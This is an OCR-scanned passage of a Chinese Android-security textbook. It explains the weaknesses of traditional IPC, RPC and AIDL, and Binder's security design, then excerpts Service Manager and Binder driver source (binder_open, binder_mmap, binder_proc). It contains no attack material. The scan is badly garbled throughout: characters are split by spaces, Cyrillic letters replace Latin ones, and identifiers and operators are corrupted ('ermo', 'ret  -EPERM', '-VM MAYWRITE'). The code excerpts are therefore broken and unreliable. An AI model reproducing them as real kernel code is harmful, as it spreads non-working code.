事实 证 明 ， 传 统 进程 通信 机 制 不 够 安全 ， 有 具体 说 明 如 下 所 示 。 
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О 在 传统 进程 通信 机 制 中 ， 接 收 进程 无 法 获得 发 送 进程 可 靠 的 用 户 标识 /进程 标识 CUID/PID) ， 所 以 
无 法 鉴别 对 方 身份 。 

о 在 传统 进程 通信 中 ， 因 为 只 能 由 发 送 进程 在 请 求 中 自行 填 入 UID 与 PID， 所 以 容易 被 恶意 程序 所 利 
用 。 由 此 可 见 ， 只 有 内 置 在 进程 通信 机 制 内 的 可 靠 的 进程 身份 标记 才能 提供 必要 的 安全 保障 。 

uU “传统 进程 通信 机 人 制 的 访问 接 入 点 是 公开 的 ， 知 道 这 些 接 入 点 的 任何 程序 都 可 能 试图 建立 连接 ,很 难 
阻止 恶意 程序 获得 连接 ， 例 如 ， 通 过 猜测 地 址 获得 连接 等 操作 就 具有 这 个 隐患 。 


42 远程 过 程 调用 机 制 (RPC) 


А 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 4 章 \ 远 程 过 程 调用 机 制 ( RPC ) avi 

在 Android 系统 中 , RPC 是 一 个 轻 量 级 的 远程 过 程 调用 机 制 , 能 够 在 本 地 调用 一 个 方法 , 但 是 在 远程 (其 
他 的 进程 中 ) 中 可 以 进行 处 理 ， 然 后 将 处 理 结果 返回 给 调用 者 。 由 此 可 见 ，RPC 机 制 的 功能 是 将 方法 调用 
及 其 附属 的 数据 以 系统 可 以 理解 的 方式 进行 分 离 ， 并 将 其 从 本 地 进程 和 本 地 地 址 空间 传送 至 远程 过 程 和 远 
程 地址 空间 ， 并 在 那里 重新 装配 并 对 调用 做 出 反应 。 在 远程 过 程 调用 返回 的 结果 中 ， 会 以 相反 的 方向 进行 
传递 。Android 系统 提供 了 完成 上 述 工 作 所 需 的 所 有 代码 ， 以 使 开发 者 可 以 集中 精力 来 实现 RPC 接口 本 身 。 

RPC 接口 可 以 只 包括 方法 ， 其 所 有 方法 在 没有 返回 值 的 情况 下 仍然 能 够 以 同步 的 方式 执行 。RPC 机 制 
的 具体 工作 流程 如 下 所 示 。 

(1) 使 用 简单 的 IDL (界面 描绘 语言 声明 一 个 想 要 实现 的 RPC 接口 。 

(2) 使 用 AIDL 工具 为 这 个 声明 生成 一 个 Java 接口 定义 ， 这 个 定义 必须 对 本 地 和 远程 进程 都 可 见 。 在 
定义 中 包含 两 个 内 部 类 ， 在 内 部 类 中 包含 了 用 IDL 声明 的 接口 的 远程 方法 调用 所 需要 的 所 有 代码 实现 。 

G) 在 定义 中 包含 的 两 个 内 部 类 都 实现 了 [Binder 接口 ， 具 体 说 明 如 下 。 

а 一 个 用 于 系统 在 本 地 内 部 使 用 ， 此 部 分 代码 可 以 忽略 。 

O 另外 一 个 是 扩展 了 Binder 类 的 Stub, 除了 实现 了 IPC 调 用 的 内 部 代码 之 外 ,还 包括 声明 的 RPC 接 口中 

的 方法 的 声明 。 

在 一 般 情况 下 ， 远 程 过 程 是 被 一 个 服务 管理 的 ， 这 是 因为 服务 可 以 通知 系统 关于 进程 以 及 其 连接 到 别 
的 进程 的 信息 ， 具 体 说 明 如 下 所 示 。 

口 包含 了 AIDL 工 具 产 生 的 接口 文件 

口 实现 了 RPC 方 法 的 Stub 的 子 类 

而 在 客户 端 只 需要 包括 ADL 工具 产生 的 接口 文件 ， 其 中 在 服务 端 与 客户 端 之 间 建 立 连接 的 过 程 如 下 所 示 。 

(1) 服务 的 客户 端 位 于 本 地 ， 用 于 实现 onServiceConnected() 和 onServiceDisconnected() 方法 。 当 至 
远程 服务 的 连接 成 功 建立 或 者 断 开 时 会 收 到 通知 ， 就 可 以 通过 调用 bindService0 的 方式 来 设置 连接 。 

(2) 服务 端 需 要 实现 onBind() 方法 以 便 接受 或 拒绝 连接 ， 此 功能 取决 于 收 到 的 Intent (Intent 将 传递 
给 bindService0) ， 如 果 接 受 了 连接 ， 则 会 返回 一 个 Stub 的 子 类 的 实例 。 

(3) 如 果 服 务 端 接受 了 连接 ， 则 Android 会 调用 客户 端的 onServiceConnected() 方 法 将 其 传递 给 一 个 
IBinder 对 象 。 这 是 由 服务 所 管理 的 Stub 的 子 类 的 代理 ， 客 户 端 通过 这 个 代理 可 以 对 远程 服务 进行 调用 。 


4.3 Binder 安全 机 制 基 础 


CE 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 4 章 \Binder 安全 机 制 基 础 .avi 
为 了 解决 传统 传输 通信 的 安全 性 问题 , Android 系统 引入 了 Binder 机 制 以 满足 系统 进程 通信 对 性 能 效率 
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和 安全 性 的 要 求 。 虽 然 Binder 基于 Client-Server 通信 模式 ， 但 是 只 需 复制 一 次 数据 对 象 ， 并 且 可 以 自动 传 
输 发 送 进程 的 UID/PID 信息 ， 同 时 支持 实名 Binder 与 匿名 Binder。 实 质 上 讲 ，Binder 机 制 提供 了 远程 过 程 
调用 CRPC) 功能， 其 实现 原理 与 COM 和 CORBA 分 布 式 组 件 架构 类 似 。 在 本 节 的 内 容 中 ， 将 简要 介绍 
Binder 通信 机 制 的 基本 知识 。 


4.3.1 Binder 中 的 安全 策略 


Binder 进程 通信 机 制 由 一 系列 组 件 组 成 ， 主 要 有 Client、Server、Service Manager 和 Binder Driver。 其 
中 ，Client、Server 和 Service Manager 是 用 户 空间 组 件 ， 而 Binder Driver 运行 于 内 核 空间 ， 是 驱动 部 分 。 用 
户 层 的 Client 和 Server 基于 Binder Driver 和 Service Manager 进行 通信 ， 这 样 开 发 者 的 任务 就 会 少 很 多 ， 通 
常 无 需 了 解 Binder Driver 与 Service Manager 的 实现 细节 ， 只 要 按照 规范 设计 实现 自己 的 Client 和 Server 组 
件 即 可 。 
Android 进程 通信 机 制 的 安全 性 要 强 于 传统 的 Linux 系统 ， 具 体 说 明 如 下 所 示 。 
O Android 应 用 程序 需要 基于 权限 机 制 ， 需 要 定义 进程 通信 的 权限 。 这 一 点 和 传统 Linux 系 统 的 IPC 机 
制 相 比 ， 具 有 更 细致 的 权限 控制 功能 。 
O Android 的 Binder 进 程 间 通 信 机 制 拥有 类 型 安全 功能 。 当 开发 者 编译 应 用 程序 时 ,可 以 使 用 接口 描述 
语言 (AIDL) 定义 交换 数据 的 类 型 ， 这 样 可 以 确保 进程 间 通 信 的 数据 不 会 发 生 溢出 越界 而 污染 进 
程 空间 。 
Q Android 的 Binder 进 程 间 通信 机 制 通 过 共享 内 存 机 制 (Ashmem) 实现 高 效率 的 进程 通信 ， 而 不 是 采 
用 传统 的 Linux/UNIX 共 享 内 存 (Shared Memory) ， 这 样 也 更 加 安全 。 
O ”因为 Binder 进 程 问 通信 机 人 制 使 用 了 Android 的 接口 描述 语言 (AIDL) ， 而 AIDL 同 传统 RPC 中 的 IDL 
语言 一 样 能 够 根据 描述 生成 代码 ， 这 样 通过 内 部 通信 进程 可 以 实现 两 个 进程 的 交互 。 
口 因为 Android 采 用 了 类 型 安全 的 接口 与 数据 描述 ， 所 以 在 接收 方 从 其 他 进程 接收 数据 时 可 以 详细 检 
查 其 安全 性 , 这 样 可 以 确保 其 他 进程 发 来 的 参数 都 在 可 接受 的 范围 内 。 无 论调 用 者 想 要 进行 什么 操 
作 ， 都 可 以 防止 进程 间 通 信 的 数据 溢出 越界 污染 进程 空间 。 


4.3.2 Binder 机 制 更 加 安全 


在 Android 系统 中 ，Activity 对 象 与 Service 对 象 在 不 同 的 进程 (Process) 里 执行 ， 各自 具 有 不 同 的 UID 
(Unix user ID) 。 由 于 各 自 独 立 执行 ， 所 以 Activity 对 象 通常 依赖 Intent 对 象 去 请 求 Android 启动 所 需要 的 

Service。 就 Service 对 象 的 开发 者 来 说 ，Activity 对 象 是 属于 外 界 〈 因 为 两 者 在 不 同 的 进程 里 执行 ) 的 软件 ， 
也 大 多 是 别人 开发 的 。 那 么 ，Service 对 象 如 何 确定 这 外 来 的 对 象 是 善意 的 呢 ? 这 就 是 安全 性 的 问题 ， 在 
Service 类 别 里 ， 当 Service 确认 了 对 方 为 善意 的 之 后 ， 就 将 IBinder 接口 的 参考 (Reference) 传 给 Activity 
XJ, Activity 对 象 就 能 通过 Binder 接口 去 使 用 Binder 的 服务 。 

在 Android 系统 中 ， 当 Activity 呼叫 [Binder 中 的 transactO) 等 函数 时 ， 会 反 向 呼叫 NotifyBinder 子 类 别 
的 onTransact() 函 数 。 此 时 也 可 以 进行 安全 检验 ， 例 如 ， 使 用 下 面 的 指令 就 能 取得 对 方 UID 来 检验 其 身份 等 
信息 ， 并 且 还 可 以 进行 checkCallingPermission() 之 类 的 检验 。 

int uid = Binder.getCallingUID(); 

如 果 经 过 检验 后 确认 访问 者 是 善意 的 ， 那 么 就 启动 BinderServer 来 提供 实质 的 服务 ， 例 如 ， 播 放 一 个 视 
频 服务 。 这 样 ， 上 面 介绍 的 安全 检验 就 是 根据 Service 的 开发 者 角度 来 分 析 的 ， 从 上 述 通 信 过 程 中 可 以 看 出 
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Android 为 什么 会 选择 Binder 为 进程 之 间 的 通信 机 制 呢 ? 只 是 因为 Binder 更 加 简洁 和 快速 ， 消 耗 的 内 
存 资源 更 小 吗 ? 这 些 也 都 是 Binder 的 优点 ， 也 是 Android 选择 Binder 的 原因 之 一 。 除 此 之 外 ， 传 统 的 进程 
间 通 信 会 增加 进程 的 开销 ， 而 且 有 进程 过 载 和 安全 漏洞 等 方面 的 风险 ， 而 Binder 机 制 正 好 可 以 解决 和 避免 
这 些 问题 。 

在 Android 系统 中 ，Binder 主要 提供 了 如 下 功能 。 

а 用 驱动 程序 来 推进 进程 间 的 通信 。 

口 通过 共享 内 存 来 提高 性 能 。 

口 为 进程 请 求 分 配 每 个 进程 的 线程 池 。 

а 针对 系统 中 的 对 象 引 入 了 引用 计数 和 跨 进程 的 对 象 引用 映射 。 

а 进程 间 同步 调用 。 


4.3.3 Binder 安全 机 制 的 必要 性 


Android 系统 作为 一 个 开放 式 的 智能 设备 系统 , 现在 已 经 拥有 了 众多 开发 者 的 平台 , 应 用 程序 的 来 源 广泛 ， 
遍及 世界 各 地 ， 水 平 也 参差 不 齐 ， 所 以 就 无 法 确保 智能 终端 的 安全 。 在 通常 情况 下 ， 终 端 用 户 不 希望 从 网 上 
下 载 的 程序 在 不 知情 的 情况 下 偷 帘 隐 私 数据 ， 连 接 无 线 网 络 和 长 期 操作 底层 设备 等 操作 会 导致 电池 很 快 耗 尽 。 
而 对 于 传统 的 IPC 机 制 来 说 ， 没 有 采取 任何 安全 措施 ， 只 是 依赖 上 层 协议 来 确保 信息 安全 。 例 如 ， 传 统 IPC 
的 接收 方 无 法 获得 对 方 进程 可 靠 的 UID/PID 用户 ID/ 进 程 ID) ， 这 样 也 就 无 法 鉴别 对 方 的 身份 。 

在 Android 系统 中 ， 为 每 个 安装 好 的 应 用 程序 分 配 了 自己 的 UID， 所 以 进程 的 UID 是 鉴别 进程 身份 的 
重要 标志 。 在 使 用 传统 IPC 机 制 时 ， 只 能 由 用 户 在 数据 包 里 填 入 UID/PID, 但 是 这 种 机 制 容易 被 恶意 程序 所 
利用 。 要 想 实现 可 靠 的 身份 标记 ， 只 能 通过 IPC 机 制 本 身 在 内 核 中 添加 实现 。 另 外 ， 传 统 IPC 访问 接 入 点 
是 开放 的 ， 无 法 建立 私有 通道 。 例 如 ， 命 名 管道 的 名 称 、System V 的 键 值 、Socket 的 IP 地 址 或 文件 名 都 是 
开放 的 ， 只 要 知道 这 些 接 入 点 的 程序 ， 就 可 以 和 对 端 建立 连接 ， 而 无 论 怎样 都 无 法 阻止 恶意 程序 通过 猜测 
接收 方 地 址 获得 连接 。 

基于 以 上 原因 ，Android 系统 迫切 需要 建立 一 套 新 的 IPC 机 制 来 满足 系统 对 传输 性 能 和 安全 性 的 高 要 求 
效果 ， 这 种 通信 方式 就 是 Binder。Binder 是 一 个 基于 Client-Server 的 通信 模式 ， 传 输 过 程 只 需 一 次 复制 ， 
为 发 送 方 添加 UID/PID 身份 ， 既 支持 实名 Binder 也 支持 匿名 Binder， 安 全 性 高 。 
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EB 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 4 章 \Binder 机 制 架构 基础 .avi 
Binder 并 不 是 Android 提出 来 的 一 套 新 的 进程 间 通 信 机 制 ， 而 是 基于 OpenBinder 来 实现 的 ， 是 一 种 进 
程 间 通 信 机 制 , 这 是 一 种 类 似 于 COM 和 CORBA 的 分 布 式 组 件 架构 ， 其 实 就 是 提供 了 远程 过 程 调用 (АРС) 
功能 。 在 Android 系统 的 Binder 机 制 中 由 一 系列 组 件 组 成 : Client、Server、Service Manager 和 Binder 驱动 
程序 ， 其 中 Client. Server 和 Service Manager 运行 在 用 户 空 间 ，Binder 驱动 程序 运行 内 核 空间 。Binder 就 是 
-种 把 这 4 个 组 件 粘 合 在 一 起 的 粘 结 剂 ， 其 中 的 核心 组 件 便 是 Binder 驱动 程序 ，Service Manager 提供 了 辅 
助 管理 的 功能 ，Client 和 Server 正 是 在 Binder 驱动 和 Service Manager 提供 的 基础 设施 上 , 实现 Client/Server 
之 间 的 通信 。Service Manager 和 Binder 驱动 已 经 在 Android 平台 中 实现 完毕 ， 开 发 者 只 要 按照 规范 实现 自 
己 的 Client 和 Server 组 件 即 可 。 对 于 初学 者 来 说 ，Android 系统 的 Binder 机 制 是 最 难 理解 的 ， 而 Binder 机 
制 无 论 从 系统 开发 还 是 应 用 开发 的 角度 来 看 ， 都 是 Android 系统 中 最 重要 的 组 成 ， 所 以 很 有 必要 深入 了 解 
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Binder 的 工作 方式 。 要 深入 了 解 Binder 的 工作 方式 ， 最 好 的 方式 是 阅读 Binder 相关 的 源 代码 。 

要 想 深 入 理解 Binder 机 制 ， 必 须 了 解 Binder 在 用 户 空间 的 3 个 组 件 Client、Server 和 Service Manager 
之 间 的 相互 关系 , 并 了 解 内 核 空间 中 Binder 驱动 程序 的 数据 结构 和 设计 原理 。 具体 来 说 , Android 系统 Binder 
机 制 中 的 4 个 组 件 Client. Server. Service Manager 和 Binder 驱动 程序 的 关系 如 图 4-1 所 示 。 
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图 4-1 #BRfF Client, Server, Service Manager 和 Binder 程序 的 关系 


图 4-1 所 示 关 系 的 具体 说 明 如 下 所 示 。 

(1) Client, Server 和 Service Manager 实现 在 用 户 空间 中 ，Binder 驱动 程序 实现 在 内 核 空间 中 。 

(2) Binder 驱动 程序 和 Service Manager 在 Android 平台 中 已 经 实现 ， 开 发 者 只 需要 在 用 户 空 间 实现 自 
己 的 Client 和 Server. 

(3) Binder 驱动 程序 提供 设备 文件 /dev/binder 与 用 户 空间 交互 ，Client、Server 和 Service Manager 通过 
文件 操作 函数 open0 和 ioctl() Binder 驱动 程序 进行 通信 。 

(4) Client 和 Server 之 间 的 进程 间 通 信 通 过 Binder 驱动 程序 间接 实现 。 

(5) Service Manager 是 一 个 保护 进程 ， 用 来 管理 Server， 并 向 Client 提供 查询 Server 接口 的 功能 。 


4.5 Service Manager 管理 Binder 机 制 的 安全 


Ей 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 4 章 \Service Manager 管理 Binder 机 制 的 安全 .avi 

在 Android 系统 中 , Service Manager 是 整个 Binder 机 制 的 保护 进程 ,用 来 管理 开发 者 创建 的 各 种 Server, 
并 且 向 Client 提供 查询 Server 远程 接口 的 功能 。 因 为 Service Manager 组 件 是 用 来 管理 Server 并 且 向 Client 
提供 查询 Server 远 程 接 口 的 功能 ,所 以 Service Manager 必然 要 和 Server 以 及 Client 进 行 通信 。Service Manger, 
Client 和 Server 分 别 是 运行 在 独立 的 进程 当中 的 , 三 者 之 间 的 通信 也 属于 进程 间 的 通信 , 而且 也 是 采用 Binder 
机 制 进行 进程 间 通 信 。 因 此 ，Service Manager 在 充当 Binder 机 制 的 保护 进程 的 角色 的 同时 也 在 充当 Server 
的 角色 ， 也 是 一 种 特殊 的 Server. 

Service Manager 在 用 户 空 间 的 源 代码 位 于 frameworks/base/cmds/servicemanager 目录 下 ， 主 要 是 由 文件 
binderh binder.c 和 service manager.c 组 成 。 Service Manager 在 Binder 机 制 中 的 基本 执行 流程 如 图 4-2 所 示 。 
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图 4-2 Service Manager 在 Binder 机 制 中 的 基本 执行 流程 
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45.4 入口 函数 


Service Manager 的 入 口 位 于 文件 service_manager.c 中 的 函数 main() 中 ， 代 码 如 下 所 示 。 
int main(int argc, char **argv)( 
struct binder state *bs; 
void *svcmgr = BINDER SERVICE MANAGER; 
bs = binder open(128*1024); 
if (binder become context manager(bs)) ( 
LOGE("cannot become context manager (%s)\n", strerror(errno)); 
return -1; 


svcmgr handle = svcmgr; 
binder loop(bs, svcmgr handler); 
return 0; 


} 

函数 main0 主 要 有 如 下 3 个 功能 。 

口 打开 Binder 设 备 文件 。 

口 告诉 Binder 驱 动 程序 自己 是 Binder 上 下 文 管理 者 ， 即 我 们 前 面 所 说 的 保护 进程 。 

О 进入 一 个 无 穷 循 环 ， 充 当 Server 的 角色 ， 等 待 Client 的 请 求 。 

在 分 析 上 述 3 个 功能 之 前 ， 先 来 看 一 下 这 里 用 到 的 结构 体 binder_state、 宏 BINDER_SERVICE_ 
MANAGER 的 定义 。 结 构 体 binder. state 在 文件 frameworks/base/cmds/ servicemanager/binder.c 中 定义 ,代码 
如 下 所 示 。 

struct binder state { 

int fd; 
void *mapped; 
unsigned mapsize; 

y 

其 中 , fd 表示 文件 描述 符 , 即 表 示 打 开 的 /dev/binder 设备 文件 描述 符 ; mapped 表示 把 设备 文件 /dev/binder 
映射 到 进程 空间 的 起 始 地 址 ; mapsize 表示 上 述 内 存 映射 空间 的 大 小 。 
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Ж BINDER. SERVICE MANAGER 在 文件 frameworks/base/cmds/servicemanager/binder.h 中 定义 ， 代 码 
如 下 所 示 。 

#define BINDER_SERVICE_MANAGER ((void*) 0) 

这 表示 Service Manager 的 句柄 为 0，Binder 通信 机 制 使 用 句柄 来 代表 远程 接口 。 


4.5.2 ”操作 设备 文件 


首先 打开 Binder 设备 文件 的 操作 函数 binder_open()， 此 函数 的 定义 位 于 文件 frameworks/base/cmds/ 
servicemanager/binder.c 中 ， 代 码 如 下 所 示 。 
struct binder_state *binder_open(unsigned mapsize)( 
struct binder_state *bs; 
bs = malloc(sizeof(*bs)); 


if (!bs) ( 
ermo = ENOMEM; 
return 0; 

} 


bs->fd = open("/dev/binder", O_RDWR); 
if (bs->fd < 0) { 
fprintf(stderr,"binder: cannot open device (%s)\n", 
strerror(ermo)); 
goto fail open; 
) 
bs->mapsize = mapsize; 
bs->mapped = mmap(NULL, mapsize, PROT READ, MAP PRIVATE, bs->fd, 0); 
if (bs->mapped == MAP FAILED) ( 
fprintf(stderr,"binder: cannot map device (%s)\n", 
strerror(errno)); 
goto fail map; 
) 
/* TODO: check version */ 
return bs; 
fail map: 
close(bs->fd); 
fail_open: 
free(bs); 
return 0; 
} 
通过 文件 操作 函数 open() 打 开设 备 文件 /dev/binder， 此 设备 文件 是 在 Binder 驱动 程序 模块 初始 化 时 创建 
的 。 接 下 来 先 看 一 下 这 个 设备 文件 的 创建 过 程 ， 来 到 kernel/common/drivers/staging/android 目录 ， 打 开 文件 
binder.c， 可 以 看 到 如 下 模块 初始 化 入 口 binder init. 
static struct file_operations binder fops ={ 
.owner = THIS MODULE, 
.poll = binder poll, 
.unlocked ioctl = binder ioctl, 
.mmap = binder mmap, 
.open = binder open, 
.flush = binder flush, 
.release = binder release, 
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y; 


static struct miscdevice binder miscdev = ( 
.minor= MISC DYNAMIC MINOR, 
.name = "binder", 
.fops = &binder_fops 

k 


static int init binder init(void) 
{ 


int ret; 


binder_proc_dir_entry_root = proc_mkdir("binder", NULL); 
if (binder_proc_dir_entry_root) 
binder proc dir entry proc = proc mkdir("proc", binder proc dir entry root); 
ret = misc register(&binder miscdev); 
if (binder proc dir entry root)( 
create proc read entry("state", 5 IRUGO, binder proc dir entry root, binder read proc state, NULL); 
create proc read entry("stats", S IRUGO, binder proc dir entry root, binder read proc stats, NULL); 
create proc read entry("transactions", S IRUGO, binder proc dir entry root, binder read proc - 
transactions, NULL); 
create proc read entry("transaction log", S IRUGO, binder proc dir entry root, binder read - 
proc transaction log, &binder transaction log); 
create proc read entry("failed transaction log", S IRUGO, binder proc dir entry root, binder - 
read proc transaction log, &binder transaction log failed); 
} 


return ret; 
cd ee TEE 
在 函数 misc_register() 中 实现 了 创建 设备 文件 的 功能 ， 并 实现 了 misc 设备 的 注册 工作 ， 在 /proc 目录 中 
创建 了 各 种 Binder 相关 的 文件 供用 户 访 问 。 通 过 函数 binder_open() 的 执行 语句 即 可 进入 到 Binder 驱动 程序 
的 binder_open() 函 数 。 
bs->fd = open("/dev/binder", O_RDWR); 


4.5.8 Binder 驱动 程序 函数 


Binder 驱动 程序 函数 binder open0 的 实现 代码 如 下 所 示 。 
static int binder open(struct inode *nodp, struct file *filp) 
{ 

struct binder proc *proc; 


if (Binder debug mask & BINDER DEBUG OPEN CLOSE) 
printK(KERN INFO "binder open: %d:%d\n", current->group_leader->pid, current->pid); 


proc = kzalloc(sizeof(*proc), СЕР KERNEL); 
if (proc == NULL) 
return -ENOMEM; 
get task struct(current); 
proc->tsk = current; 
INIT LIST HEAD(&proc-»todo); 
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init_waitqueue_head(&proc->wait); 
proc->default_priority = task_nice(current); 
mutex_lock(&binder_lock); 
binder_stats.obj_created[BINDER_STAT_PROC}++; 
hlist_add_head(&proc->proc_node, &binder_procs); 
ргос->ріа = current->group_leader->pid; 

INIT LIST HEAD(&proc-»delivered death); 
filp-2private data = proc; 

mutex unlock(&binder lock); 


if (binder proc dir entry ргос) { 
char strbuf[11]; 
snprintf(strbuf, sizeof(strbuf), "You", proc->pid); 
remove_proc_entry(strbuf, binder_proc_dir_entry_proc); 
create proc read entry(strbuf, S IRUGO, binder proc dir entry proc, binder read proc proc, proc); 
} 
return 0; 
} 
上 述 函 数 的 主要 作用 是 创建 一 个 名 为 binder proc 的 数据 结构 ， 用 此 数据 结构 来 保存 打开 设备 文件 
/dev/binder 的 进程 的 上 下 文 信息 ,并 且 将 这 个 进程 上 下 文 信息 保存 在 打开 文件 结构 file 的 私有 数据 成 员 变量 
private data 中 。 


4.5.4” 红 黑 树 节点 结构 体 


结构 体 struct binder proc 也 被 定义 在 文件 kernel/common/drivers/staging/android/binder.c P, 具体 代 码 如 
下 所 示 。 

struct binder_proc ( 
struct hlist_node proc_node; 
struct rb_root threads; 
struct rb_root nodes; 
struct rb_root refs_by_desc; 
struct rb_root refs_by_node; 
int pid; 
struct vm_area_struct *vma; 
struct task_struct *tsk; 
struct files struct *files; 
struct hlist_node deferred_work_node; 
int deferred work; 
void *buffer; 
ptrdiff t user buffer offset; 
struct list head buffers; 
struct rb rootfree buffers; 
struct rb root allocated buffers; 
size tfree async space; 
Struct page **pages; 
size tbuffer size; 
uint32 t buffer free; 
struct list head todo; 
wait queue head t wait; 


55 


© 


ВЭЭ Android 系统 安全 和 反 编 译 实战 


struct binder stats stats; 
struct list head delivered death; 
int max threads; 
int requested threads; 
intrequested threads started; 
int ready threads; 
long default priority; 
y 
上 述 结构 体 的 成 员 比 较 多 , 其 中 最 为 重要 的 4 个 成 员 变量 为 :threads、nodes、refs by_desc 和 refs by_node。 
上 述 4 个 成 员 变量 都 是 表示 红 黑 树 的 节点 , ИШ binder proc 分 别 挂 在 4 个 红 黑 树 下 , 具体 说 明 如 下 所 示 。 
O threads 树 : 用 来 保存 binder_proc 进 程 内 用 于 处 理 用 户 请 求 的 线程 , 其 最 大 数量 由 max_threads 来 决定 。 
口 node 树 : 用 来 保存 binder_proc 进 程 内 的 Binder 实 体 。 
口 _refs_by_desc 树 和 refs_by_node 树 : 用 来 保存 binder_proc 进 程 内 的 Binder 引 用 ， 即 引用 的 其 他 进程 的 
Binder 实 体 ， 分 别 用 两 种 方式 来 组 织 红 黑 树 ， 一 种 是 以 句柄 作为 key 值 来 组 织 ， 一 种 是 以 引用 的 实 
体 节点 的 地 址 值 作为 key 值 来 组 织 ， 二 者 表示 同一 实体 ， 只 不 过 是 为 了 内 部 查找 方便 而 用 两 个 红 黑 
这 样 ， 打 开设 备 文件 /dewbinder 的 操作 就 完成 了 ， 接 下 来 需要 对 打开 的 设备 文件 进行 内 存 映射 操作 mmap。 
bs->mapped = mmap(NULL, mapsize, PROT_READ, MAP_PRIVATE, bs->fd, 0); 
对 应 Binder 驱动 程序 的 是 函数 binder mmap0， 实 现代 码 如 下 所 示 。 
static int binder mmap(struct file *filp, struct vm area struct *vma) 
{ 
int ret; 
struct vm_struct *area; 
struct binder proc *proc = filp->private_data; 
const char *failure string; 
struct binder buffer *buffer; 
if ((vma->vm_end - vma-»vm start) > SZ 4M) 
vma-»vm end = vma-»vm start + SZ 4M; 
if (Binder debug mask & BINDER DEBUG OPEN CLOSE) 
printk(KERN_INFO 
"binder ттар: %d %lx-%lx (Yld K) vma %lx pagep %lx\n", 
proc->pid, vma->vm_start, vma->vm_end, 
(vma->vm_end - vma-»vm start) / SZ 1K, vma->vm flags, 
(unsigned long)pgprot val(vma-»vm page prot)); 
if (yma-»vm flags & FORBIDDEN MMAP FLAGS) ( 
ret  -EPERM; 
failure string = "bad vm flags"; 
goto err bad arg; 
} 
vma-»vm flags = (vma->vm_flags | VM DONTCOPY) & -VM MAYWRITE; 


if (proc->buffer) ( 
ret - -EBUSY; 
failure string = "already mapped"; 
goto err already mapped; 

} 


area = get_vm_area(vma->vm_end - vma->vm_start, VM_IOREMAP); 
if (area == NULL) ( 
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ret = -ENOMEM; 
failure string = "get vm area"; 
goto err get vm area failed; 
} 
proc->buffer = area->addr; 
proc->user_buffer_offset = vma->vm_start - (uintptr_t)proc->buffer; 


#ifdef CONFIG CPU CACHE МРТ 
if (cache is vipt aliasing()) { 
while (CACHE COLOUR((vma-»vm start ^ (uint32 t)proc-»buffer))) { 
printK(KERN INFO "binder ттар: %d %lx-%lx maps %p bad alignment\n", proc->pid, 
vma-»vm start, vma-»vm end, proc->buffer); 
vma-»vm start += PAGE SIZE; 
} 
} 
#endif 
proc->pages = kzalloc(sizeof(proc-»pages[0]) * ((vma->vm_end - vma->vm_start) / PAGE SIZE), GFP_KERNEL); 
if (proc->pages == NULL) { 
ret = -ENOMEM; 
failure_string = "alloc page array"; 
goto err_alloc_pages_failed; 
} 


proc->buffer_size = vma->vm_end - vma->vm_start; 


vma-»vm ops = &binder vm ops; 
vma-»vm private data = proc; 


if (Binder update page range(proc, 1, proc-» buffer, proc->buffer + PAGE SIZE, ута)) { 
ret = -ENOMEM; 
failure string = "alloc small buf"; 
goto err alloc small buf failed; 


) 

buffer = proc->buffer; 
INIT_LIST_HEAD(&proc->buffers); 
list_add(&buffer->entry, &proc->buffers); 
buffer->free = 1; 

binder_insert_free_buffer(proc, buffer); 
proc->free_async_space = proc->buffer_size / 2; 
barrier(); 

proc->files = get_files_struct(current); 
proc->vma = vma; 


/*printk(KERN_INFO "binder ттар: %а %lx-%lx maps %p\n", proc->pid, vma->vm_start, vma->vm_end, 
proc->buffer);*/ 
return 0; 


err_alloc_small_buf_failed: 
kfree(proc->pages); 
ргос->радеѕ = NULL; 

err_alloc_pages_failed: 
vfree(proc->buffer); 
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proc->buffer = NULL; 
err_get_vm_area_failed: 
err_already_mapped: 
err_bad_arg: 
printk(KERN_ERR "binder_mmap: %d %lx-%lx 96s failed %d\n", proc->pid, vma->vm_start, vma->vm_end, 
failure_string, ret); 
return ret; 


} 

在 上 述 函数 binder mmap(0 中 ， 首 先 通过 filp->private_data 得 到 在 打开 设备 文件 /dev/binder 时 创建 的 结 
FJ binder_proc。 内 存 映射 信息 放 在 ута 参数 中 。 此 处 vma 的 数据 类 型 是 结构 vm_area_struct， 表 示 的 是 一 块 
连续 的 虚拟 地 址 空间 区 域 。 另 外 ， 结 构 体 vm_struct 表示 一 块 连续 的 虚拟 地 址 空间 区 域 。 

接 下 来 分 析 一 下 binder proc 结构 体 中 的 如 下 成 员 变量 。 
buffer: 是 一 个 void* 指 针 ， 表 示 要 映射 的 物理 内 存在 内 核 空间 中 的 起 始 位 置 。 
buffer size: 是 一 个 size_t 类 型 的 变量 ， 表 示 要 映射 的 内 存 的 大 小 。 
pages: 是 一 个 struct page* 类 型 的 数组 ，struct page 是 用 来 描述 物理 页 面 的 数据 结构 。 
user buffer offset: 是 一 个 ptrdiff t 类 型 的 变量 ,表示 的 是 内 核 使 用 的 虚拟 地 址 与 进程 使 用 的 虚拟 地 
址 之 间 的 差 值 ， 即 如 果 某 个 物理 页 面 在 内 核 空间 中 对 应 的 虚拟 地 址 是 addr， 那 么 这 个 物理 页 面 在 进 
程 空间 对 应 的 虚拟 地 址 为 如 下 格式 。 
addr + user_buffer_offset 


4.5.5 ”管理 内 存 映射 地 址 空间 


接 下 来 还 需要 了 解 Binder 驱动 程序 管理 内 存 映 射 地 址 空间 的 方法 ， 即 如 何 管理 buffer ~ (buffer + 
buffer_size) 这 段 地 址 空间 ,这 个 地 址 空间 被 划分 为 一 段 一 段 来 管理 , 每 一 段 是 用 结构 体 binder buffer 来 描述 
的 ， 共 体 代码 如 下 所 示 。 

struct binder_buffer { 

struct list_head entry; /* free and allocated entries by addesss */ 

struct rb_node rb_node; /* free entry by size or allocated entry */ 
/* by address */ 

unsigned free : 1; 

unsigned allow_user_free : 1; 

unsigned async_transaction : 1; 

unsigned debug_id : 29; 

struct binder_transaction *transaction; 

struct binder_node *target_node; 

size_t data_size; 

size_t offsets_size; 

uint8 t data[0]; 


oooo 


y 

每 一 个 binder buffer 通过 其 成 员 entry 按 从 低地 址 到 高 地 址 连 入 到 struct binder_proc 中 的 buffers 表示 的 
链表 中 去 ， 并 且 每 一 个 binder buffer 又 分 为 正在 使 用 的 和 空闲 的 ， 通 过 free 成 员 变 量 来 区 分 ， 空 闲 的 
